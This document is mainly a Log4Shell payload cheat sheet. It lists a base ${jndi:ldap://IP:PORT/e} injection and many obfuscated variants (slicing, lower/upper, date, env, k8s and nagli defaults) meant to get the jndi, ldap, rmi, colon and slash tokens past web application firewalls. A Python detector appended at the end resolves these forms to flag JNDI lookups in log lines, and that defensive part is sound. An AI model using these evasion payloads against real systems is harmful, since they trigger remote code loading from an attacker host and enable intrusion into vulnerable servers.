Initial payload

${jndi:ldap://IP:PORT/e}

Bypass techniques

The following operations get past a WAF without affecting the initial payload.

Slicing

${::-CHAR}

lower

${lower:STRING}

date

${date:'CHAR'}

env NaN

${env:NaN:-CHAR}

env HL

${env:HL:-CHAR}

env BARFOO

${env:BARFOO:-CHAR}

upper

${upper:CHAR}

k8s k5

${k8s:k5:-STRING}

sd k5

${sd:k5:-CHAR}

nagli

${nagli:-CHAR}

Bypassing the jndi string

The bypass payloads below can replace the jndi string in the initial payload.

Slicing

${::-j}${::-n}${::-d}${::-i}
${::-j}ndi
${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}

lower

${lower:jndi}
${lower:${lower:jndi}}
${lower:j}${lower:n}${lower:d}i

lower and upper

${lower:j}${upper:n}${lower:d}${upper:i}

date

${date:'j'}${date:'n'}${date:'d'}${date:'i'}

env NaN

${env:NaN:-j}ndi

env HL

${env:HL:-j}ndi

env BARFOO

${env:BARFOO:-j}ndi

k8s k5

j${k8s:k5:-ND}i

Bypassing the ldap string

The bypass payloads below can replace the ldap string in the initial payload.

Slicing

${::-l}${::-d}${::-a}${::-p}

env NaN

${env:NaN:-l}dap

Bypassing the rmi string

The bypass payloads below can replace the rmi string in the initial payload.

Slicing

${::-r}${::-m}${::-i}

lower

${lower:rmi}
${lower:r}m${lower:i}

env NaN

${env:NaN:-r}mi

Bypassing the colon

The bypass payloads below can replace the colon in the initial payload.

env NaN

${env:NaN:-:}

env BARFOO

${env:BARFOO:-:}

sd k5

${sd:k5:-:}

nagli

${nagli:-:}

Bypassing the double slash

The bypass payloads below can replace the // in the initial payload.

Slicing

${:::::::::-//}
${::-/}/
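
Every form listed above resolves back to the same jndi lookup, so a detection rule has to match the resolved string rather than the raw text. The following is an added example, not part of the original page: it approximates Log4j's lookup resolution for the lower, upper, date and default-value forms and reports any JNDI lookup a log line collapses to. The function names and the sample lines are constructed for illustration, and env/k8s/sd keys are assumed to be unset.

```python
import re

# A lookup that has no other lookup nested inside it.
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")

def resolve(body, hits):
    """Approximate the text Log4j substitutes for one lookup body."""
    key, _, default = body.partition(":-")    # ${key:-default}
    prefix, _, arg = key.partition(":")
    name = prefix.lower()                     # lookup prefixes are case-insensitive
    if name == "jndi":
        hits.append(body)                     # fully de-obfuscated JNDI lookup
        return ""
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    if name == "date":
        return arg.replace("'", "")           # keeps quoted literals such as 'j'
    # Assumption: env/k8s/sd keys and unknown names are unset, so the default is used.
    return default

def find_jndi(text, max_rounds=20):
    """Return every JNDI lookup body that `text` resolves to."""
    hits = []
    for _ in range(max_rounds):               # one nesting level per round, bounded
        text, count = INNERMOST.subn(lambda m: resolve(m.group(1), hits), text)
        if count == 0:
            break
    return hits

# Constructed sample log lines (192.0.2.10 is a documentation address).
SAMPLES = [
    "GET /?q=${jndi:ldap://192.0.2.10:1389/e}",
    "UA: ${${::-j}${::-n}${::-d}${::-i}:${env:NaN:-l}dap${nagli:-:}${::-/}/192.0.2.10:1389/e}",
    "X-Api: ${j${k8s:k5:-ND}i:${lower:rmi}://192.0.2.10/e}",
    "login ok at ${date:yyyy-MM-dd}",
]

def scan(lines):
    """Map 1-based line number -> resolved JNDI bodies, for lines that contain any."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := find_jndi(line))}

if __name__ == "__main__":
    for lineno, found in scan(SAMPLES).items():
        print(lineno, found)
```

Matching on the output of find_jndi instead of on the literal text "jndi" is what makes a rule hold up against the substitutions on this page.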